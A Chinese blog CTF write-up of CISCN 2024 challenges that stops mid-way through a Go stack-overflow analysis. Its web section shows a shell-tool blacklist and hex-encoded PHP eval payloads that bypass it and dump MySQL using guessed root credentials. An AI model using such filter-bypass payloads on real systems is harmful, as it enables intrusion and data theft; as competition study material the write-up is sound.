



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta name="referrer" content="no-referrer"/>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="golden的部落阁" href="http://blog.g01den.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="golden的部落阁" href="http://blog.g01den.top/atom.xml" />
<link rel="alternate" type="application/json" title="golden的部落阁" href="http://blog.g01den.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Game" />


<link rel="canonical" href="http://blog.g01den.top/posts/9dd9bec.html">



  <title>
Ciscn2024 - CTFer的比赛之路 |
golden的部落阁 = golden的部落阁 = subtitle写得真好</title>
<meta name="generator" content="Hexo 7.2.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Ciscn2024
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2024-05-20 19:10:34">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2024-05-20T19:10:34+08:00">2024-05-20</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">golden的部落阁</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="https://gitee.com/gou-dengyue/images/raw/master/picture74.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/Game/" itemprop="item" rel="index" title="分类于 CTFer的比赛之路"><span itemprop="name">CTFer的比赛之路</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://blog.g01den.top/posts/9dd9bec.html">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="g01den">
    <meta itemprop="description" content="subtitle写得真好, golden的部落阁">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="golden的部落阁">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="web"><a class="markdownIt-Anchor" href="#web">#</a> Web</h2>
<h3 id="simple_php"><a class="markdownIt-Anchor" href="#simple_php">#</a> Simple_php</h3>
<p>​		这个 Simple_php 一点儿也不 Simple (⋟﹏⋞)<br>
​		源码放这儿了：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;open_basedir&#x27;</span>, <span class="string">&#x27;/var/www/html/&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$cmd</span> = <span class="title function_ invoke__">escapeshellcmd</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]); </span><br><span class="line">  <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|&#123;|&#125;|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\&#x27;|\&quot;|id|whoami/i&#x27;</span>, <span class="variable">$cmd</span>)) &#123;</span><br><span class="line">    <span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>​		很明显，POST 一个 cmd 进去，然后通过 escapeshellcmd 函数对参数进行转义，然后进行逆天的正则，之后 RCE。<br>
​		大概就是这样，还能干啥？全都给过滤了，还能咋绕过？<br>
​		首先是信息搜集，不过有用的似乎没多少，查看进程发现一个 MySQL 的进程，可以试着打一下 MySQL：</p>
<blockquote>
<p>mysql        277  0.0 16.9 1083992 89076 pts/0   Sl+  07:38   0:00 /usr/sbin/mariadbd --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/run/mysqld/mysqld.sock</p>
</blockquote>
<p>​		看来是攻击 MySQL 了，猜测用户是 root，密码随便猜，这道题也是 root，运气好，猜中了，那么，先查数据库：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">//构造这个查询语句</span><br><span class="line"><span class="built_in">echo</span> `mysql <span class="literal">-uroot</span> <span class="literal">-proot</span> <span class="literal">-e</span> <span class="string">&quot;SHOW DATABASES&quot;</span>`;</span><br><span class="line">//payload </span><br><span class="line">cmd=php+<span class="literal">-r</span>+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253484f572044415441424153455322603b,<span class="number">2</span>)));</span><br><span class="line">//结果</span><br><span class="line">Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c45435420534348454d415f4e414d45204153205048505f434d532046524f4d20494e464f524d4154494f4e5f534348454d412e534348454d4154413b22603b - assumed <span class="string">&#x27;aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c45435420534348454d415f4e414d45204153205048505f434d532046524f4d20494e464f524d4154494f4e5f534348454d412e534348454d4154413b22603b&#x27;</span> (this will <span class="keyword">throw</span> an Error <span class="keyword">in</span> a future version of PHP) <span class="keyword">in</span> Command line code on line <span class="number">1</span></span><br><span class="line">PHP_CMS</span><br><span class="line">information_schema</span><br><span class="line">mysql</span><br><span class="line">performance_schema</span><br><span class="line">PHP_CMS</span><br></pre></td></tr></table></figure>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//构造这个查询语句</span><br><span class="line"><span class="built_in">echo</span> `mysql <span class="literal">-uroot</span> <span class="literal">-proot</span> <span class="literal">-e</span> <span class="string">&quot;select table_name as PHP_CMS from information_schema.TABLES where TABLE_SCHEMA=&#x27;PHP_CMS&#x27;&quot;</span>`;</span><br><span class="line">//payload </span><br><span class="line">cmd=php+<span class="literal">-r</span>+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b,<span class="number">2</span>)));</span><br><span class="line">//结果</span><br><span class="line">Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b - assumed <span class="string">&#x27;aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b&#x27;</span> (this will <span class="keyword">throw</span> an Error <span class="keyword">in</span> a future version of PHP) <span class="keyword">in</span> Command line code on line <span class="number">1</span></span><br><span class="line">PHP_CMS</span><br><span class="line">F1ag_Se3Re7</span><br></pre></td></tr></table></figure>
<p>​		查一下这个 F1ag_Se3Re7，不出意外的话，应该 flag 在这里面：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//构造这个查询语句</span><br><span class="line"><span class="built_in">echo</span> `mysql <span class="literal">-uroot</span> <span class="literal">-proot</span> <span class="literal">-e</span> <span class="string">&quot;SELECT * FROM PHP_CMS.F1ag_Se3Re7&quot;</span>`;  </span><br><span class="line">//payload</span><br><span class="line">cmd=php+<span class="literal">-r</span>+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b,<span class="number">2</span>)));</span><br><span class="line">//结果</span><br><span class="line">Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b - assumed <span class="string">&#x27;aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b&#x27;</span> (this will <span class="keyword">throw</span> an Error <span class="keyword">in</span> a future version of PHP) <span class="keyword">in</span> Command line code on line <span class="number">1</span></span><br><span class="line">id	f1ag66_2024</span><br><span class="line"><span class="number">1</span>	flag&#123;e784d525<span class="literal">-93a1-466b-9f22-38a3add54dfe</span>&#125;</span><br></pre></td></tr></table></figure>
<p>​		flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;e784d525-93a1-466b-9f22-38a3add54dfe&#125;</span><br></pre></td></tr></table></figure>
<p>​		补充：</p>
<blockquote>
<p>1. 因为存在 escapeshellcmd 函数，所以在转义之后，在 system 函数中，&quot;在经过 hex2bin 之后，就能够表示字符串&quot; 本身<br>
 2. 在构造 substr 的时候，第一个参数没有引号也能正常使用，只是会出现一个报错</p>
</blockquote>
<h2 id="re"><a class="markdownIt-Anchor" href="#re">#</a> Re</h2>
<h3 id="asm_re"><a class="markdownIt-Anchor" href="#asm_re">#</a> asm_re</h3>
<p>ex<br>
 数据段，数据段分配内存，每一个数据段会获得 2 个内存单元<br>
计算机采用小端存储，小端字节序存储：把一个数据的低位字节的内容，存储在低地址处，把高位字节的内容，存储在高地址处；<br>
数据段：存放数据的段。使用时候，用 DS 寄存器<br>
大于一个字节长度的 16<span class="exturl" data-url="aHR0cHM6Ly9zby5jc2RuLm5ldC9zby9zZWFyY2g/cT0lRTglQkYlOUIlRTUlODglQjYmYW1wO3NwbT0xMDAxLjIxMDEuMzAwMS43MDIw"> 进制</span>数据进行高低位分割之后进行传输<br>
<img data-src="https://img-blog.csdnimg.cn/img_convert/9bd76a5d388c6179608478ae4475a8c9.png" alt="image.png"><br>
DCB：用于分配一片连续的字节存储单元并用指定的数据初始化<br>
 DCB 表示：它分配一段字节的内存单元，它每个操作数都占有一个字节，操作数范围为 - 128～255 的数值或字符串。<br>
关键部分<br>
<img data-src="https://img-blog.csdnimg.cn/img_convert/a2e84faa2cc3dfc118736c6fdc18b8b3.png" alt="image.png"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">100</span>];</span><br><span class="line">    <span class="type">int</span> data[] =  &#123;<span class="number">0x1FD7</span>, <span class="number">0x21B7</span>, <span class="number">0x1E47</span>, <span class="number">0x2027</span>, <span class="number">0x26E7</span>, <span class="number">0x10D7</span>, <span class="number">0x1127</span>, <span class="number">0x2007</span>, <span class="number">0x11c7</span>, <span class="number">0x1e47</span>, <span class="number">0x1017</span>, <span class="number">0x1017</span>,</span><br><span class="line">                   <span class="number">0x11f7</span>, <span class="number">0x2007</span>, <span class="number">0x1037</span>, <span class="number">0x1107</span>, <span class="number">0x1f17</span>, <span class="number">0x10d7</span>, <span class="number">0x1017</span>, <span class="number">0x1017</span>, <span class="number">0x1f67</span>, <span class="number">0x1017</span>, <span class="number">0x11c7</span>, <span class="number">0x11c7</span>, <span class="number">0x1017</span>,</span><br><span class="line">                   <span class="number">0x1fd7</span>, <span class="number">0x1f17</span>, <span class="number">0x1107</span>, <span class="number">0xf47</span>, <span class="number">0x1127</span>, <span class="number">0x1037</span>, <span class="number">0x1e47</span>, <span class="number">0x1037</span>, <span class="number">0x1fd7</span>, <span class="number">0x1107</span>, <span class="number">0x1fd7</span>, <span class="number">0x1107</span>, <span class="number">0x2787</span>&#125;;</span><br><span class="line">    <span class="type">int</span> len;</span><br><span class="line">    len=<span class="keyword">sizeof</span>(data)/<span class="keyword">sizeof</span>(data[<span class="number">0</span>]);</span><br><span class="line">    <span class="type">int</span> index=<span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> j=<span class="number">0</span>;j&lt;len;j++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">32</span>;i&lt;<span class="number">128</span>;i++)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>((((i*<span class="number">0x50</span>+<span class="number">0x14</span>)^<span class="number">0x4D</span>)+<span class="number">0x1E</span>)==data[j])</span><br><span class="line">            &#123;</span><br><span class="line">                flag[index++]=(<span class="type">char</span>)i;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    flag[index]=<span class="string">&#x27;\0&#x27;</span>;<span class="comment">//char型</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">puts</span>(flag);</span><br><span class="line">    <span class="comment">//flag&#123;67e9a228e45b622c2992fb5174a4f5f5&#125;	</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="pwn"><a class="markdownIt-Anchor" href="#pwn">#</a> Pwn</h2>
<h3 id="gostack复现"><a class="markdownIt-Anchor" href="#gostack复现">#</a> gostack（复现）:</h3>
<p>go 语言的栈溢出，没遇到过，赛后复现下，看看能否干出来。<br>
首先是检查保护，不过 64 位，出了 NX 之外没有任何保护，那就简单不少，拖到 IDA 里看看，很轻松就能找到 mainmain：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// main.main</span><br><span class="line">void __fastcall main_main()</span><br><span class="line">&#123;</span><br><span class="line">  __int64 v0; // r14</span><br><span class="line">  void *retaddr; // [<span class="type">rsp</span>+<span class="number">8</span><span class="type">h</span>] [<span class="type">rbp</span>+<span class="number">0</span><span class="type">h</span>] BYREF</span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> ( (unsigned __int64)&amp;retaddr &lt;= *(_QWORD *)(v0 + <span class="number">16</span>) )</span><br><span class="line">    runtime_morestack_noctxt();</span><br><span class="line">  main_main_func1();</span><br><span class="line">  <span class="keyword">if</span> ( (unsigned __int8)main_main_func3() )</span><br><span class="line">    main_main_func2();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>不过这个很明显，有点看不懂，毕竟没接触过 go 语言，那么，先直接运行下看看程序是啥情况？：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@g01den<span class="literal">-virtual-machine</span>:/mnt/shared<span class="comment"># ./pwn</span></span><br><span class="line">Welcome to CISCN!</span><br><span class="line">Happy magic golang!</span><br><span class="line">Input your magic message :</span><br><span class="line">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaa</span><br><span class="line">Your magic message :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaa</span><br></pre></td></tr></table></figure>
<p>就结束了，没了，感觉很简单，有输入，但是只有一次写入。<br>
这个运行里给了一部分信息，那么凭借这些信息很轻松就找到了主要部分函数的地方：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line">// main.main.func3</span><br><span class="line">__int64 __golang main_main_func3(__int64 a1, __int64 a2)</span><br><span class="line">&#123;</span><br><span class="line">  __int64 v2; // r14</span><br><span class="line">  __int128 v3; // xmm15</span><br><span class="line">  __int64 v4; // rax</span><br><span class="line">  __int64 v5; // rcx</span><br><span class="line">  __int64 v6; // rdx</span><br><span class="line">  int v7; // r11d</span><br><span class="line">  int v8; // ebx</span><br><span class="line">  int v9; // r11d</span><br><span class="line">  int v10; // ecx</span><br><span class="line">  int v11; // r8d</span><br><span class="line">  int v12; // r9d</span><br><span class="line">  int v13; // r10d</span><br><span class="line">  int v14; // r11d</span><br><span class="line">  __int64 v15; // rbx</span><br><span class="line">  int v16; // r8d</span><br><span class="line">  int v17; // r9d</span><br><span class="line">  int v18; // r10d</span><br><span class="line">  int v19; // r11d</span><br><span class="line">  int v20; // ecx</span><br><span class="line">  int v21; // r8d</span><br><span class="line">  int v22; // r9d</span><br><span class="line">  int v23; // r11d</span><br><span class="line">  char *v24; // rdx</span><br><span class="line">  unsigned __int8 *v25; // r10</span><br><span class="line">  __int64 i; // rax</span><br><span class="line">  __int64 v27; // rax</span><br><span class="line">  int v28; // r10d</span><br><span class="line">  int v29; // r11d</span><br><span class="line">  __int64 v31; // [<span class="type">rsp</span>+<span class="number">10</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">208</span><span class="type">h</span>]</span><br><span class="line">  __int64 v32; // [<span class="type">rsp</span>+<span class="number">10</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">208</span><span class="type">h</span>]</span><br><span class="line">  char v33[<span class="number">72</span>]; // [<span class="type">rsp</span>+<span class="number">48</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">1</span><span class="type">D0h</span>] BYREF</span><br><span class="line">  char v34; // [<span class="type">rsp</span>+<span class="number">90</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">188</span><span class="type">h</span>] BYREF</span><br><span class="line">  unsigned __int8 *v35; // [<span class="type">rsp</span>+<span class="number">148</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="type">D0h</span>]</span><br><span class="line">  __int64 v36; // [<span class="type">rsp</span>+<span class="number">150</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="type">C8h</span>]</span><br><span class="line">  __int128 v37; // [<span class="type">rsp</span>+<span class="number">158</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="type">C0h</span>] BYREF</span><br><span class="line">  _QWORD v38[<span class="number">2</span>]; // [<span class="type">rsp</span>+<span class="number">168</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="type">B0h</span>] BYREF</span><br><span class="line">  char *v39; // [<span class="type">rsp</span>+<span class="number">178</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="type">A0h</span>]</span><br><span class="line">  __int64 v40; // [<span class="type">rsp</span>+<span class="number">180</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">98</span><span class="type">h</span>]</span><br><span class="line">  __int64 v41; // [<span class="type">rsp</span>+<span class="number">188</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">90</span><span class="type">h</span>]</span><br><span class="line">  __int64 v42[<span class="number">4</span>]; // [<span class="type">rsp</span>+<span class="number">190</span><span class="type">h</span>] [<span class="type">rbp</span>-<span class="number">88</span><span class="type">h</span>] BYREF</span><br><span class="line">  __int64 v43; // [<span class="type">rsp</span>+<span class="number">1</span><span class="type">B0h</span>] [<span class="type">rbp</span>-<span class="number">68</span><span class="type">h</span>]</span><br><span class="line">  __int64 v44; // <span class="function">[<span class="type">rsp</span>+<span class="number">1</span><span class="type">B8h</span>] [<span class="type">rbp</span>-<span class="number">60</span><span class="type">h</span>]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> ( (unsigned __int64)&amp;v34 &lt;= *(_QWORD *)(v2 + <span class="number">16</span>) )</span><br><span class="line">    runtime_morestack_noctxt();</span><br><span class="line">  v4 = ((__int64 (__fastcall *)(char *))loc_4606F4)(v33);</span><br><span class="line">  v39 = v33;</span><br><span class="line">  v40 = <span class="number">256</span>LL;</span><br><span class="line">  v41 = <span class="number">256</span>LL;</span><br><span class="line">  ((void (__golang *)(__int64, __int64, __int64, __int64 *))loc_460722)(v4, a2, v5, v42);</span><br><span class="line">  v42[<span class="number">0</span>] = (__int64)off_4DF4E8;</span><br><span class="line">  v42[<span class="number">1</span>] = v6;</span><br><span class="line">  v42[<span class="number">2</span>] = (__int64)&amp;off_4C5DD0;</span><br><span class="line">  v42[<span class="number">3</span>] = <span class="number">0</span>x10000LL;</span><br><span class="line">  fmt_Fprintf(</span><br><span class="line">    (unsigned int)off_4DF508,</span><br><span class="line">    qword_5633E8,</span><br><span class="line">    (unsigned int)<span class="string">&quot;Happy magic golang!\n&quot;</span>,</span><br><span class="line">    <span class="number">20</span>,</span><br><span class="line">    <span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,</span><br><span class="line">    <span class="number">0</span>,</span><br><span class="line">    (unsigned int)off_4DF4E8,</span><br><span class="line">    v7);</span><br><span class="line">  v38[<span class="number">0</span>] = &amp;RTYPE_string;</span><br><span class="line">  v38[<span class="number">1</span>] = &amp;off_4DF040;</span><br><span class="line">  v8 = qword_5633E8;</span><br><span class="line">  fmt_Fprintf(</span><br><span class="line">    (unsigned int)off_4DF508,</span><br><span class="line">    qword_5633E8,</span><br><span class="line">    (unsigned int)<span class="string">&quot;%s&quot;</span>,</span><br><span class="line">    <span class="number">2</span>,</span><br><span class="line">    (unsigned int)v38,</span><br><span class="line">    <span class="number">1</span>,</span><br><span class="line">    <span class="number">1</span>,</span><br><span class="line">    (unsigned int)&amp;off_4DF040,</span><br><span class="line">    v9);</span><br><span class="line">  bufio__ptr_Scanner_Scan((unsigned int)v42, v8, v10, <span class="number">2</span>, (unsigned int)v38, v11, v12, v13, v14);</span><br><span class="line">  v15 = v43;</span><br><span class="line">  v35 = (unsigned __int8 *)runtime_slicebytetostring(<span class="number">0</span>, v43, v44, <span class="number">2</span>, (unsigned int)v38, v16, v17, v18, v19, v31);</span><br><span class="line">  v36 = v15;</span><br><span class="line">  v24 = v39;</span><br><span class="line">  v25 = v35;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>LL; v15 &gt; i; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v20 = *v25;</span><br><span class="line">    *v24++ = v20;</span><br><span class="line">    ++v25;</span><br><span class="line">  &#125;</span><br><span class="line">  v37 = v3;</span><br><span class="line">  v27 = runtime_convTstring((_DWORD)v35, v36, v20, <span class="number">2</span>, (unsigned int)v38, v21, v22, (_DWORD)v25, v23, v32);</span><br><span class="line">  *(_QWORD *)&amp;v37 = &amp;RTYPE_string;</span><br><span class="line">  *((_QWORD *)&amp;v37 + <span class="number">1</span>) = v27;</span><br><span class="line">  fmt_Fprintf(</span><br><span class="line">    (unsigned int)off_4DF508,</span><br><span class="line">    qword_5633E8,</span><br><span class="line">    (unsigned int)<span class="string">&quot;Your magic message 